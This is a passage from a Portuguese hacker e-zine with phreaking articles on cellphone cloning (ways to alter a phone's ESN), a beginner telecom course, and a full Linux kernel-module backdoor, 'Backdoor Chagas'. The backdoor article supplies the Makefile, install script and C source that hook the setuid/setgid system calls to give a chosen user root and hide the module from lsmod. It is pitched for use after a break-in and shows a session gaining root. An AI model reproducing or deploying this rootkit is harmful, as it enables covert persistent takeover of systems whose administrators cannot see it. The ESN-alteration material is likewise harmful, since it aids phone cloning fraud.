#define __NR_rt_sigreturn       173
#define __NR_rt_sigaction       174
#define __NR_rt_sigprocmask     175
#define __NR_rt_sigpending      176
#define __NR_rt_sigtimedwait    177
#define __NR_rt_sigqueueinfo    178
#define __NR_rt_sigsuspend      179
#define __NR_pread              180
#define __NR_pwrite             181
#define __NR_chown              182
#define __NR_getcwd             183
#define __NR_capget             184
#define __NR_capset             185
#define __NR_sigaltstack        186
#define __NR_sendfile           187
#define __NR_getpmsg            188  
#define __NR_putpmsg            189  
#define __NR_vfork              190


Esta aih.


Eh, a secao "Linux" nao ficou tao grande assim, mas ja eh 
alguma coisa:). Nao pessoal, essa secao foi planejada pra
isso mesmo, ser pequena. Mas a proxima edicao da zine tah 
vindo cheia de novidades sobre linux, de gerenciamento a 
administracao. Aguardem!!. Ate lah!!:)  





[6] .
    .\
    ..\
    ...\
    ....\
    [-----------------------------------------]
    [--- Clonagem de Celular - Finalizando ---]
    [--- Por Blood_Sucker                  ---]
    [--- (blooding@punkmail.com)           ---]
    [-----------------------------------------]
                                          \....
                                           \...
                                            \..
                                             \.



1. Introducao
2. Porque nao funciona??
3. Possiveis maneiras de se alterar o ESN
4. Finalizando

=================================================================



1. Introducao
-------------

Eae pessoal? tudo bom?
Bem, como eu havia dito na edicao anterior da bth, eu iria dar
algumas explicacoes sobre akele meu texto de clonagem. Bem, eh
o seguinte: Clonagem de celular nao eh feita somente alterando
a NAM!!!!!! Hehehe, imagino sua reacao agora, "porra, o cara faiz
um texto sobre algo q nao funciona mesmo sabendo disso???". Sim,
eu fiz esse texto sob o seguinte intuito: Incentivar o aprendizado.
Pois minha motivacao maior em escrever eh divulgar mais e mais o 
phreaking no brasil, coisa q eh muito pouco divulgada.
Contribuir para o crescimento de uma comunidade eh uma honra e 
tambem uma responsabilidade. Espero estar fazendo a minha parte.
Se vc acha q eu estou tentando aparecer, ou algo do tipo, soh tenhu
uma coisa a dizer: pessoas como vc nao merecem esta informacao. 
Suma daki!!! Bem, agora irei explicar os motivos do porque esse 
eskema q eu lhes passei nao funciona e explicar como isso realmente 
funciona =]




2. Porque nao funciona??
------------------------

Pelo seguinte motivo: para vc clonar um celular vc precisa alterar
o ESN tb. Pois as companhias de celulares tem um cadastro de ESN/MIN. 
MIN eh o numero do telefone + o codigo de area. E o ESN eh o numero de
serie do telefone, q eh fornecido pelo proprio fabricante. 
Quando um celular faz uma chamada, a central identifica o ESN e a MIN 
e faz uma comparacao com a do registro deles. Se os dados estiverem 
batendo, ele continua a ligacao. Ou seja, vc alterando soh a MIN, nao 
ira adiantar, a central ira recusar a finalizacao da ligacao. Eh por 
isso q precisamos alterar o ESN para se clonar um celular.
O MIN eh possivel reprogramar ridiculamente facilmente. Pois o proprio
celular ja nos traz essa facilidade. Ja com ESN nao temos essa 
facilidade. Pois ambas(ESN e MIN) fikam em uma memoria EEPROM, q eh 
uma memoria regravavel eletricamente. 

Agora, vc se pergunta se ja q a memoria do celular eh regravavel, pq 
nao eh possivel alterar a ESN?? Calma, ninguem disse q nao eh possivel. 
Eu soh disse q o celular nao da esta facilidade pra vc igual ele faz 
com a MIN. Continue lendo...



3. Possiveis maneiras de se alterar o ESN
-----------------------------------------

Existem poucas maneiras de se alterar o ESN(numero de serie). Duas 
delas ja foram comprovadas, ja uma outra eh uma teoria logica, apesar 
de nunca ter ouvido falar em alguem q fez.
As maneiras sao:

- Dessoldando o circuito impresso q contem a ESN, acoplando-o em
um regravador de EEPROM, alterando o dado e depois soldando devolta. 
Porem existe um pequeno probleminha, eh um servicinhu um tanto quanto 
delicado, pois CIs EEPROMs sao extremamente sensiveis e precisa ter 
muita tecnica para poder fazer issu sem danificar. Realmente eh
bastante delicado.

- Utilizando um Loner. Loner eh um aparelho(uma especie de cabo com 
um terminalzinhu pra vc reprogramar) q eh ligado ao celular. Com ele 
vc pode reprogramar ESN e MIN em segundos. Eh um aparelho muito 
cogitado no mercado negro. Pra vcs terem uma ideia, um Loner custa 
mais de 15 mil reais. Alem de ser algo dificil de se encontrar, pois 
nao eh uma coisa vendida legalmente, eh logico.

- Se um Loner eh um cabo q ligado no celular, pode ser usado para 
reprograma-lo, pq um cabo ligado ao celular e ligado ao computador,
nao poderia ser usado tambem??? Ueh, um computador pode fazer tudo 
q o circuitinhu do Loner faz. Pode reprogramar em assembly a EEPROM. 
Bem, esta eh uma teoria levantada, pois eu nunca ouvi falar de alguem 
q ja tenha feito isso, porem eu tenha muita curiosidade em testar algo.
Pois existem programas para alterar coisas simples do celular, tais
como a NAM e algumas outras frescuras. Agora, programa para alterar
ESN, segundo um amigo meu, se existir, eh completamente private, pois 
nao eh uma coisa q se divulga por ae.

Eu pretendo fazer testes quanto a issu. Pois tenho procurado muito 
sobre essas coisas e estou preparando um cabo tambem. Espero em breve
obter resultados quanto a isso. Pois descreverei detalhadamente aki
pra vcs como fazer , caso eu obtenha sucesso. Se alguem quiser me 
ajudar ou tiver alguma info sobre isso, mail me =] 



4. Finalizando
--------------

Bem, terminei aki esta secao para a explicacao disso. Nao havia visto 
nenhum material em portugues sobre isso ateh hj. Ha um tempo atras eu
resolvi peskisar mais sobre isso e tudo q eu encontrava eram manuais 
do tipo: "como clonar seu celular" e com informacoes apenas para alterar 
NAM(coisa q ateh um cachorro faz). Tb encontrei muito material ripado. 
Lembro-me do primeiro material em portugues sobre isso da Axur05. 
Posteriormente, alguns outros lugares publicaram essas coisas. E o 
pior de tudo eh q esse eskema ja na funciona ha muuito tempo.
Bem, eu escrevi no intuito de alarmar issu e posteriormente dar uma 
explicacao definitiva. Pois o mais intrigante, foi q recebi emails de 
pessoas dizendo: "cara, consegui clonar o celular da minha mina, valeu 
cara!!!" hehehehe. 
Bem, este projeto nao acaba aki, estou em constante busca sobre isso
e se vc estiver afim de me ajudar, entre em contato comigo.

Agradecimentos: Ao brother Proide, por sempre ter me ajudado e 
ao hophet por me dar oportunidade de escrever pra esta zine =]. 
E eh claro, agradeco a todos meus amigos q seguem a etica e 
crescem cada vez mais:

http://unsekurity.virtualave.net/
http://phreakhaos.cjb.net/

T+, Blood_Sucker!
"Odiado por muitos e compreendido por poucos..."




[7] .
    .\
    ..\ 
    ...\
    ....\
    [-------------------------------------------]
    [--- Curso de Telecomunicacoes - Parte 1 ---]
    [--- Feito por Blood_Sucker              ---]
    [--- (blooding@punkmail.com)             ---]
    [-------------------------------------------]
                                            \....
                                             \...
                                              \..
                                               \.




Sumario:

1.0. Introducao
2.0. Analogico e Digital
2.1. Introducao ao sinal analogico
2.2. Frequencia em servicos analogicos
2.3. Os problemas dos sinais analogicos
2.4. Introducao ao sinal digital
2.5. Comos os sinais digitais funcionam
2.6. Vantagens nos sinais digitais
3.0. Largura de Banda
3.1. Banda larga e banda estreita
4.0. Estruturas de Comunicacoes
4.1. OSI - Uma estrutura de comunicacoes baseada em camadas
5.0. Modems
5.1. Comandos do modem
6.0. Finalizando

=================================================================


1.0. Introducao
===============

Eae galera? Bele?
Bem, estou aki mais uma vez na bth, para iniciar um "curso" de 
telecomunicacoes. Este curso tera varias etapas, pois tentarei 
explicar varios conceitos de telecomunicacoes. Porem nao pensem 
q este eh um curso de phreaking, pois eu nao irei explicar nada 
sobre algum tipo de box, ou alguma coisa do tipo. Eh um curso
para esclarecimento sobre diversas coisas da tecnologia atual.
Os textos mais relacionados ao phreaking em si tb serao publicados, 
mas nao em conjunto com este aki, esse aki eh somente sobre 
telecomunicacoes. Bom, o intuito principal do texto eh influenciar 
no aprendizado dos colegas e tb na maior divulgacao do phreaking no
brasil. Agora vc me pergunta, "mas vc nao acabou de falar q o texto 
nao tem haver com phreaking??". Nao tem haver?? Eh logico q tem haver,
a diferenca eh q eu nao irei abordar tecnicas para ligar de graca, ou
sobre como fazer blue box e tals. Nunca relacionem o phreaking apenas 
a isso. Pois o phreaking, assim como o hacking, eh um estilo de vida. 
Alguem ja viu hacker sem conhecimento tecnico??? Digo hackers de 
verdade. Pois eh do q estou tentando dizer, mas em relacao ao phreaking. 
Nao existe phreaker q nao tenha conhecimentos de telecomunicacoes, pois 
esse pessoalzinho por ai q soh pega um programinha estilo blue beep e 
fika fazendo blue box se achando OS PHREAKERS estao muito longe da 
realidade. Pois estes saun os script kiddies, isso mesmo, nao pensem q 
o script kidding soh tem relacao aos hackers. Quantos ao phreaking 
tambem! Bem, ja falei o q tinha de falar e espero q gostem do curso, 
irei publicar de edicao por edicao da bth. Talvez eu ateh publique 
mais de uma parte do curso em cada edicao, mas nao garanto q isso 
possa acontecer.  Agora chega de papo furado e vamos nessa!!

 
2.0. Analogico e Digital
========================

Sinais analogicos e digitais. Eis o tema desta secao. Muitas vezes 
ouco falar de "telefones analogicos" ou "cara, comprei um celular 
digital", porem poucos sabem q o q eh analogico ou digital eh o 
SINAL usado para a comunicacao de dados. E nao o aparelho telefonico. 
Bem, aqui irei explicar como funciona issu. 
Vamos la!


2.1. Introducao ao sinal analogico
----------------------------------

Bem galera, vamus descrever o sinal analogico e depois o sinal 
digital ok? Desde a invencao do telefone em 1876, o sinal analogico 
passou a ser usado para enviar o som. Pra quem nao sabe, o som nao
eh transportado pelo fio do telefone, ele eh convertido em ondas 
eletromagneticas e depois ele eh desconvertido la do outro lado. 
O sinal analogico eh desta maneira, e nao soh em linhas telefonicas 
mas tb em tvs a cabo. O sinal analogico soh eh comum em linhas 
telefonicas mais antigas, agora a parada eh toda digital. Este formato 
antigo de servicos analogicos chama-se POTS (Plain Old Telephone 
Service). Pois servicos assim saun utilizados (issu eh, quando
sao) em linhas residenciais e tals.


2.2. Frequencia em servicos analogicos
--------------------------------------

Frequencia eh a maneira de como os sinais viajam. Nos sinais 
analogicos, a frequencia refere-se ao numero de vezes por segundo 
em q uma onda oscila ou vibra de um lado para o outro em um ciclo 
completo de seu ponto inicial ateh seu ponto final. Entenderam?
Tipo, um ciclo completo, acontece quando a onda inicia na voltagem 0,
sobe ateh a parte mais alta da onda, desce ateh a parte mais negativa 
da onda e entaun volta ao 0 novamente. O nome de cada ciclo completo 
eh Hertz(Hz). Sendo assim, uma onda eh medida em hertz por segundo. 
Tipo, se uma onda oscila ou vibra de um lado para o outro 50 vezes por 
segundo, a velocidade do sinal eh de 50 hertz por segundo.
Em telefones, um sinal de voz eh transmitido em um intervalo de 300
a 3300 Hz. Portanto sua frequencia eh de 3000 hertz. Porque calcula-se 
a largura de banda do sinal subtraindo o intervalo mais baixo do mais 
alto.  Sakou? =]
As frequencias analogicas assim como as unidades de medida de um
computador saun abreviadas. Mas saun diferentes das do computador. 
Elas saun diferenciadas em:

- kilohertz(kHz) = milhares de hertz por segundo
- megahertz(MHz) = milhoes de hertz por segundo
- gigahertz(Ghz) = bilhoes de hertz por segundo

Eh claro q eh bem mais generico do q em computador, mas eh assim q 
funfa. Irei tentar demonstrar nesse desenhinho ai embaixo um ciclo 
completo.


                 ######
               ##      ##      <= Voltagem Positiva
             ##          ## 
            #              #
- - - - - - - - - - - - - - - - - - - - - - - - - - > Voltagem Nula(0)
                            #              #
                             ##          ##
    Voltagem Negativa =>       ##      ##
                                 ###### 


Bem, nao sei se vc entendeu mas eu tentei desenhar uma onda 
eletromagnetica hehehehehehe. Eh mais ou menos como o sinal 
"tio"(~). Pois encare o desenho como uma onda, e o q esta assima 
da voltagem nula eh voltagem positiva e o q esta abaixo eh a 
voltagem negativa. Isso eh um ciclo de um sinal analogico.
Espero q tenha entendido, como eu ja expliquei, as frequencias saun
a maneira de como os sinais viajam, e as frequencias saun medidas 
em hertz. Pois veja no desenho o oscilamento, quando a onda excede 
a voltagem nula ela se torna uma voltagem positiva e quando ela esta 
abaixo de uma voltagem nula, ela se torna uma voltagem negativa. 
Portanto , se o oscilamento do negativo ateh o positivo eh de 800 
vezes por segundo, entao eh uma frequencia de 800 hertz. 
Espero q tenha entendido.


2.3. Os problemas dos sinais analogicos
---------------------------------------

Os sinais analogicos se diferem dos digitais principalmente por seus
problemas e limitacoes. Pois quanto mais longe for o ponto final, mas
fraco fika o sinal e pior xega la a qualidade de som. 
Alem disso, podem existir interferencia eletrica em sinais analogicos.
Existe um aparelho q tenta "empurrar" o sinal, ou sei la, ajudar a ir
direito, como se fosse um boi xifrando a bunda dele pra ele ir mais
rapido, este aparelho eh chamado de amplificador, mas dependendo da
distancia nao adianta muito naum.


2.4. Introducao ao sinal digital
--------------------------------

Os sinais digitais saun totalmente diferentes dos sinais analogicos. 
Pois Ao inves dos sinais serem transmitidos atravez de ondas, eles 
saun transmitidos em forma de bits. Sim, os sinais digitais saun 
transmitidos binariamente. Ou seja, composto por duas partes. Isso 
quer dizer q os sinais saun transmitidos via bits ligados ou 
desligados. Ou seja, 0s (zeros) e 1s(uns). Por issu q o sinal digital 
eh melhor, pois eh bem mais facil enviar sinais q dispoem de duas 
situacoes(ligado ou desligado) do q por ondas complexas, como no 
sinal analogica. Se vc nao esta entendendo muito bem, irei explicar
melhor. 


2.5. Comos os sinais digitais funcionam
---------------------------------------

Bem, como eu ja falei na introducao, o sinal digital eh trasmitido
via bits. E como eh uma transmissao binaria, esses bits possuem 
apenas dois estados: Ligado(1) ou Desligado(0). Pois os sinais 
digitais nao sao medidos em hertz, do qual ja expliquei o 
funcionamento na parte de sinais analogicos. Ele eh medido em 
quantidade de bits por segundo. Assim como no computador. Ou seja, 
em bits por segundo(BPS). Pois vou tentar mostrar nesse desenho aki, 
como os sinais digitais viajam:


        +======+
        |######|
        |######|    <= Bit Positivo
        |######|
        |######|    
- - - - - - - - - - - - - - - - - - - - - - - - - > Voltagem Nula(0)
               |######|
               |######|
               |######|  <= Bit negativo
               |######|
               +======+


Entenderam?? Ao inves de viajar em ondas, ele vai de bit em bit. 
A forma de medir eh a seguinte, um ciclo completo foi o q eu desenhei 
ai encima, a quantidade de vezes q um ciclo eh completado por segundo, 
eh q eh a maneira de medir a frequencia do mesmo. Se um bit se torna 
positivo e negativo 800 vezes por segundo, eh uma frequencia de 800 bps.
Porem, o desempenho eh completamente diferente. Eh muito mais vantagem 
ter um sinal assim do q em ondas. Veja as vantagens. 


2.6. Vantagens nos sinais digitais
----------------------------------

Tanto os sinais analogicos como os digitais estao sujeitos a 
interferencias, problemas na transmissao, ou enfraquecimento 
devido a distancia. Porem os sinais digitais saun bem melhor
reparados do q os sinais analogicos. Pois saun varias as vantagens 
dos sinais digitais em relacao aos analogicos:

- Maior velocidade. Pois obviamente eh muito mais rapido um sinal q 
soh tem 2 estados(ligado ou desligado) do q um sinal de ondas 
complexas.

- Qualidade de voz mais clara. Pois dessa maneira os dados viajam 
mais seguros. Pois contem menos erros porque eh bem mais facil 
reparar um sinal via bits do q ondas, o resultado em recompor 
um bit eh muito melhor do q recompor uma onda.

- Eh mais simples e nao necessita de periferico Complexo.

Bem, acho q foi possivel entender como possionam os sinais, agora 
iremos abordar outros itens mais complexos.


3.0. Largura de Banda
=====================

Largura de banda nada mais nada menos significa a capacidade de uma
determinada banda. Por exemplo, como ja vimos, os sinais analogicos 
saun medidos por hertz. Se por exemplo, um cabo coaxial tem uma 
frequencia de 300MHz. Sua largura de banda eh esta. Pois quanto maior
for o tamanho entre a frequencia inicial e a frequencia final(ja 
discutida no comeco deste texto) maior eh a capacidade de banda. 
Issu tratando de sinais analogicos. Em servicos digitais como ISDN, 
T1 e ATM, a capacidade de banda eh declarada em quantidade de bits 
por segundo. Veremos as capacidade de algumas larguras de bandas:

===============================================
  Banda |          largura de banda           |
===============================================
  ISDN  | 64 mil bits por segundo             |
  T-1   | 1,54 milhoes de bits por segundo    |
  ATM   | 622 milhoes de bits por segundo     |
  ATM2  | 13,22 bilhoes de bits por segundo   |
===============================================

Estas saun as larguras de banda. Vejamos agora a diferenca entre banda 
larga e banda estreita.


3.1. Banda larga e banda estreita
---------------------------------

Eis uma tabela retirada de um livro com comparacoes entre bandas 
largas e estreitas.

=====================================================================
       Banda Estreita          |            Banda Larga             |
=====================================================================
T-1 a 1,54 Mbps: 24 canais de  | Servicos de transmissoes de TV     |
voz ou dados atraves de fibra  | utiliza 6 MHz por canal: A mais    |
optica, microonda de infraver- | nova TV de alta definicao digital  |
melho ou dois pares de fios.   | (HDTV) oferece maior definicao ou  |
                               | nitidez que a TV analogica.        |
Linhas analogicas a 3000 hz:   |                                    |
Servico telefonico convencio-  | TV a cabo (CATV) a TV de antena    |
nal (POTS). Os modems permi-   | comunitaria a 700 MHz: TV de       |
tem que linhas analogicas      | transmissoes locais e por satelite.|
transportem dados de computa-  | Tambem disponivel para comunicacao |
dores digitais.                | de dados e acesso a internet.      |
                               |                                    |
BRI ISDN a 144 kbps: Duas vias | ATM: Um servico de alta velocidade |
para voz ou dados, cada uma a  | capaz de enviar voz, video e dados.|
64 kbps. Um caminho para sinais|                                    |
a 16 kbps.                     | SONET: Uma interface de multiple-  |
			       | xacao optica para transmicao de    |
			       | alta velocidade. Utilizada princi- | 
			       | palmente em centrais e redes de    |
                               | companhias telefonicas.            |
                               |                                    |
                               | T3(equivalente a 28 circuitos T-1):|
                               | Uma maneira de transmitir 672 con- |
                               | versas por fibra optica ou microon-|
                               | da digital.                        |
=====================================================================


4.0. Estruturas de Comunicacoes
===============================

Bem, na epoca de 1970 aproximadamente, foi desenvolvida pela
IBM uma arquitetura para comunicacoes chamada SNA(Systems Network
Architecture). Mas como a toda poderosa IBM feiz esta arquitetura 
especificamente para ela, novos projetos foram comecados. Dentre 
eles, a Digital criou a sua arquitetura Decnet, e varias outras 
empresas criaram tb suas arquiteturas. Mais ou menos na mesma 
epoca ali, a ISO(International Standards Organization) desenvolveu 
uma outra arquitetura. Esta arquitetura eh a grande conhecida OSI
(Open Systems Interconnection). Foi criada como intuito de 
comunicacoes abertas dentre dispositivos. Mal sabiam eles q tinham 
acabado de criar a estrutura de comunicacoes mais usada no mundo 
inteiro ateh hj. Pois teve um grande impacto na area de 
telecomunicacoes. 


4.1. OSI - Uma estrutura de comunicacoes baseada em camadas
-----------------------------------------------------------

O modelo OSI, assim chamado de "Modelo de Referencia para 
Interconexao de Sistemas Abertos", revolucionou muita coisa 
nos conceitos de redes. Tanto a internet como as rede locais
saun baseadas em conceitos desenvolvidos pelo padrao OSI para 
uma arquitetura em camadas. Vejamos agora o q significam as 
camadas do modelo OSI.

Camada 1: Eis a camada mais basica. A chamada camada fisica. Ela 
define a interface eletrica e tipos de midia e tals. Por exemplo, 
tomadas, cobre, cabeamento, fibra optica. 

Camada 2: Esta camada eh chamada de camada de enlance de dados. Os
dispositivos de camada 2 sao analogos ao encaminhamento de um 
sistema para o outro. 

Camada 3: Eis aki a conhecida como camada de rede. Esta camada tem 
definicoes mais complexas para enderecos e encaminhamentos e tb mais 
controles de erros do q a camada 2. Elas saun responsaveis pelo 
trafego entre redes. Digamos q a camada 3 eh uma camada 2 mais 
complexa.

Camada 4: Chegamos a camada de transporte. Esta camada 
responsabiliza-se pela transmissao "segura" entre roteadores 
e enderecos. 

Camada 5: Esta eh a camada de controle. Pois ela gerencia quais
sessoes serao enviadas, em q ordem, por exemplo, duas sessoes podem
ser enviadas ao mesmo tempo? ele define issu tudo, quem manda primeiro, 
quem recebe de quem.

Camada 6: Camada de apresentacao. Ela controla o formato ou aparencia 
na qual a informacao chega. Eu a chamo de camada meiga hehehehe.

Camada 7: Chegamos a ultima camada, a camada de aplicacao. Ela 
aplica-se a servicos especializados  de transferencias.

  
5.0. Modems
===========

Hj em dia todo mundo sabe o q eh modem. Bem, o modem eh uma placa,
q eh encaixada na placa mae, no qual recebe os dados via linha 
telefonica e converte-os em som ao xegar(ateh ai o telefone tb
faz), e converte esses sons em sinais digitais e os transfere para
o micro de uma maneira q o computador entenda. Eh assim q funciona 
o modem. Desse processo todo ai vem o nome MODEM, MOdulator/
DEModulator em ingles, q significa MOdulador/DEModulador 
(de sinais neh).


5.1. Comandos do modem
----------------------

Irei aki listar alguns comandos do modem mais interessantes. 

======================================================================
 Comando |            Explicacao                                     |
======================================================================
   AT	 | AT vem de ATention, q define velocidade e outros processos|
         | juntos                                                    |
                                                              
   A/    | Este comando re-executa o ultimo comando dado caso o modem| 
         | nao tenha completado a conexao                            |
          	
   A	 | O modem vai fikar como se estivesse fora do gancho, vc    |
         | ouvira o som da linha                                     |
                                           
   C0    | Define transmicao com carrier off	                     |                      					  
   C1	 | Define transmicao com carrier on	                     |					  
   D	 | Dial, Comando de discagem 				     |			  
   E0	 | O modem nao ira transmitir respostas no terminal	     |			  
   E1    | O modem ira transmitir as resposta no terminal	     |			  
   F0	 | Define o modem com half duplex			     |			  
   F1	 | Define o modem com full duplex			     |			  
   H0  	 | O modem ira desligar(desconectar)   			     |			  
   I0	 | Mostra o codigo de identificacao do produto	             |				  
   L1    | Define o volume do falante como baixo 		     |			  
   L2	 | Define o volume do falante como medio	             |				  
   L3    | Define o volume do falante como alto	                     |					  
   M0	 | Desliga o falante								  
   M2    | Define o falante para fikar sempre ligado(inclusive       |
         |  enquanto esta conectado)	                             |

   P     | Pulse, para discagems com linhas de pulso(em linhas de    |
         | tom funciona da mesma maneira pq linhas de tom dao opcao  |
         | pra pulso tambem.				             |

   T     | Tone, para discagens com linhas de tom                    |					  
   V0    | Pequenos codigos numericos de resultados do modem	     |			  
   V1    | Codigos completos de resultados do modem                  |					  
   X0    | CONNECT codigos de resultado ativados                     |					  
   X1    | CONNECT BBBB codigos de resultado ativados, blind dial    |
         | mas nao detecta sinais de ocupado.                        |									  
   X2    | O modem espera por um sinal de tom antes de comecar a     | 
         | discar (ele da linha e depois disca), todas as respostas  |
         | do modem estao ativadas, mas o sinal de ocupado nao eh    | 
         | detectado (este aki esta configurado no pppd do slack por |
         | padrao no slack, ppp-go r0x!)		   	     |

   X3    | Blind dials, todos os resultados do CONNECT BBBB ativados,|
         | e o modem diz q a linha esta ocupada, caso esteja.	     |				 	  
   X4    | O modem espera por um sinal de tom antes de comecar a     |
         | discar(ele da linha e depois disca), todos os resultados  | 
         | do CONNECT BBBB ativados e o modem diz q a linha esta     |
         | ocupada caso esteja.                                      |						  
   Z     | Usa um devido profile para sua configuracao	             |			          
========================================================================


6.0. Finalizando
================

Bem, chegamos ao fim desta primeira parte do curso de 
telecomunicacoes. Pois esta bem basico mesmo. Estou apenas 
mostrando os itens essenciais para o aprendizado na area de 
telecomunicacoes. Pois a secao sobre modens foi soh um bonus 
ai pra vcs, o mais importante foram os conceitos sobre os
sinais, larguras de banda e estruturas de comunicacoes. 
Mais pra frente irei entrar na parte mais interessante, 
a telefonia em si!!! Pois t vejo na proxima edicao da bth, 
a qual nao tem data para ser publicada. Aguardem!
Ateh mais galera! 

Blood_Sucker
"Odiado por muitos e compreendido por poucos..."





[8] .
    .\
    ..\
    ...\
    ....\
    [-----------------------------] 
    [--- Backdoor Chagas - LKM ---]
    [--- Feito por Hophet      ---]
    [--- hophet@yahoo.com.br   ---]
    [-----------------------------]
                              \.... 
                               \...
                                \..
                                 \.




OBS.: Nao me responsabilizo pelo mau uso deste soft, o
objetivo do mesmo eh totalmente educacional.  


Introducao:
-----------


Tem uma nova backdoor aih na area:), usei LKM que eh muito
poderoso para tal aplicacao tambem. 

Este eh um LKM que pode ser usado logo apos uma investida
bem sucedida(rooted) para garantir um acesso root facil ao 
sistema num acesso futuro. O que ele faz eh interceptar o
__NR_setuid e __NR_setgid e checar se o UID e GID do user que 
esta logando no sistema eh igual ao que voce definui em "#define 
UID <uid>" assim como o GID em "#define GID <gid>" onde <uid> eh 
o UID do usuario que voce quer que seja elevado e <gid> eh o GID 
do user que voce quer que seja elevado a 0, se o UID e o GID do 
user que logou eh igual ao que voce definui no "define" entao ele 
eleva o UID e GID a 0(root). 
Depois de carregado o modulo, ele vai ficar em "modo Stealth" nao
aparecendo em um "lsmod" e tb nao exportara simbolo algum, ficando
tambem oculto ao /proc/ksyms, assim a Bd Chagas depois de carregada
nao sera mais vista pelo admin do sistema rootado, e eh soh
agora vc logar sempre no sistema com aquele user e normalmente
ter poder de root no sistema pois seu UID e GID foi elevado 
a 0(root). Eu aconselho escolher um user com GID diferente,
ou seja, de um grupo proprio, reservado.       

Voce deve mudar o "#define UID <uid>" e "#define GID <gid>
no arquivo "bdchagas.c".

Um exemplo seria:

...

#define UID 1000
#define GID 1003

...



Arquivos:
---------

Makefile    --> Rotina de Compilacao.
install.sh  --> O Script de Instalacao.
bdchagas.c  --> O fonte da backdoor(LKM).
README.txt  --> Arquivo contendo informacoes sobre o soft.
O readme vc encontra no pacote, baixe no site:).



Makefile: 
---------

<++> bdchagas/Makefile

GCC     = /usr/bin/gcc

clean:
        # Compilando a Backdoor Chagas!!! - Criando o LKM
        $(GCC) -c -O3 -o bdchagas.o bdchagas.c

<-->

install.sh:
-----------

<++> bdchagas/install.sh

#!/bin/sh

clear
echo "################# Hophet - Backdoor Chagas v0.2 #################"
echo "Compilando... "
/usr/bin/make
echo "Compilado com Sucesso!!!"
echo "Instalando a Backdoor Chagas v0.2..."
/sbin/insmod bdchagas.o
echo "Backdoor Chagas instalada com Sucesso!!!"
echo
echo "Visite:"
echo "http://unsekurity.virtualave.net"
echo "http://www.bthzine.cjb.net"
echo "http://hophet.hobbiton.org"
echo

#EOF

<-->

bdchagas.c:
-----------

<++> bdchagas/bdchagas.c

/*
 * Nome: bdchagas.c - LKM
 * Descricao: Esta Backdoor eleva o UID e GID
 * de um user normal a 0.
 * Escrito por Hophet vulgo Pol Meyen.
 * <hophet@yahoo.com.br>
 *
 */

#define     MODULE
#define   __KERNEL__

#include <linux/kernel.h>
#include <linux/module.h>
#include <sys/syscall.h>
#include <asm/unistd.h>
#include <asm/uaccess.h>
#include <linux/malloc.h>

#define UID 1000  /* coloque o UID do user que quer elevar */
#define GID 100   /* coloque o GID do user que quer elevar */

/* acesso a tabela de system calls. */
extern void* sys_call_table[];

/*
 * backups das funcoes hackeadas
 */

int (*o_setuid)(uid_t uid);
int (*o_setgid)(gid_t gid);


int n_setuid(uid_t uid)
{
    if(uid == UID)
      {
         current->uid = 0;
         return 0;
      }
    else
      {
         return o_setuid(uid);
      }
}

int n_setgid(gid_t gid)
{
    if(gid == GID)
      {
         current->gid = 0;
         return 0;
      }
    else
      {
         return o_setgid(gid);
      }
}


/*
 * funcao stealth
 */

void esconde_do_lsmod(void)
{
   /* modulos */
   struct module *modl = &__this_module;
   struct module *bd = NULL;

   /* processo de stealth */
   bd = modl->next;

   if (bd)
     {

        int i;

        modl -> name  = bd -> name;
        modl -> size  = bd -> size;
        modl -> flags = bd -> flags;

        for (i = 0; i < GET_USE_COUNT(bd)+1; i++)
            MOD_INC_USE_COUNT;

        modl -> next  = bd -> next;

     }
}


/*
 * Iniciando o trabalho da bd.
 */

int init_module(void)
{
   /* hackeia o __NR_setuid */
   o_setuid = sys_call_table[__NR_setuid];
   sys_call_table[__NR_setuid] = n_setuid;

   /* hackeia o __NR_setgid */
   o_setgid = sys_call_table[__NR_setgid];
   sys_call_table[__NR_setgid] = n_setgid;

   /* avisa que o modulo foi carregado */
   printk("<1>  Backdoor Chagas v0.2 Inicializada\n");

   /* modo stealth ativo */
   esconde_do_lsmod();

   /* nao exportando simbolos */
   EXPORT_NO_SYMBOLS;

   printk("<1>  Modulo carregado!!!\n");

   return 0;
}

/*
 * Finalizamdo o trabalho da bd.
 */

void cleanup_module(void)
{
   /* restaura o __NR_setuid */
   sys_call_table[__NR_setuid] = o_setuid;

   /* restaura o __NR_setgid */
   sys_call_table[__NR_setgid] = o_setgid;

   printk("<1>  Backdoor Chagas v0.2 Finalizada!\n");
   printk("<1>  Modulo descarregado!!!\n");
}

<-->


Esta aih os codes. Tipo use o extract que veio em conjunto 
com a zine. Use:

$ gcc extract.c -o extract
$ ./extract bth01.txt


Instalando:
-----------


Primeiro descompacte com "tar -zxvf bdchagas-0.2.tar.gz", 
compile-a com "make" e carregue com "insmod bdchagas.o", 
ou rode o script "install.sh". Para usa o script "install.sh" 
faca isto antes "chmod +x install.sh" e depois "./install.sh". 
Pronto a Backdoor Chagas esta instalada no sistema.

Ilustrando:

sh-2.03# chmod +x install.sh
sh-2.03# ./install.sh

################# Hophet - Backdoor Chagas v0.2 #################
Compilando...
# Compilando a Backdoor Chagas!!! - Criando o LKM
/usr/bin/gcc -c -O3 -o bdchagas.o bdchagas.c
Compilado com Sucesso!!!
Instalando a Backdoor Chagas v0.2...
Backdoor Chagas instalada com Sucesso!!!

Visite:
http://unsekurity.virtualave.net
http://www.bthzine.cjb.net
http://hophet.hobbiton.org

 
Pronto agora eh soh loga com o user que voce definiu em 
bdchagas.c, e voi lah:) 

localhost login: <user>
Password:<senha_do_user>
Last login: Mon Jul 10 03:07:14 -0400 2000 on tty2.
You have mail.
root@localhost:<user>$ id
uid=0(root) gid=0(root) groups=1003(<user>)
root@localhost:<user>$

Ohhh funfa:). Tenham bom proveito, mas use consientimente.


Finalizando:
------------


O poder da Backdoor pode ser aumentado e muito, sugestoes sao
aceitas e muitas modificacoes seram feitas nas proximas 
versoes. Aguardem!!! Mas mesmo assim , tome cuidade ao 
manipular esta Backdoor, o admin pode esta rodando algum
LKM que monitore o sistema contra este tipo de operacao, 
por isso cheque antes(voce tem root:). Mas todo o cuidado
nestas horas eh pouco. 

Que todos que venham usar ou apenas ler estas palavras 
lembrem que o objetivo eh trazer mais material aos fucadores
newbies, intao se tem criticas construtivas fique avontade 
em me conta-las, mas se esta afim de me criticar ou de 
criticar alguem ou ate criticar algum fucador destrutivamente
eu acho que no hacking verdadeiro nao tem lugar pra voce nao,
a nao ser que mude de ideia, ao contrario deveria ajudar e 
assim crescer um pouco mais.  


Contato:
--------

Qualquer problema ou sugestao pode mandar um e-mail para
"hophet@yahoo.com.br".

  
Um abraco!!!


Hophet a.k.a Pol Meyen.






[9] .
    .\
    ..\
    ...\
    ....\
    [--------------------------]
    [--- Desafios da Edicao ---]
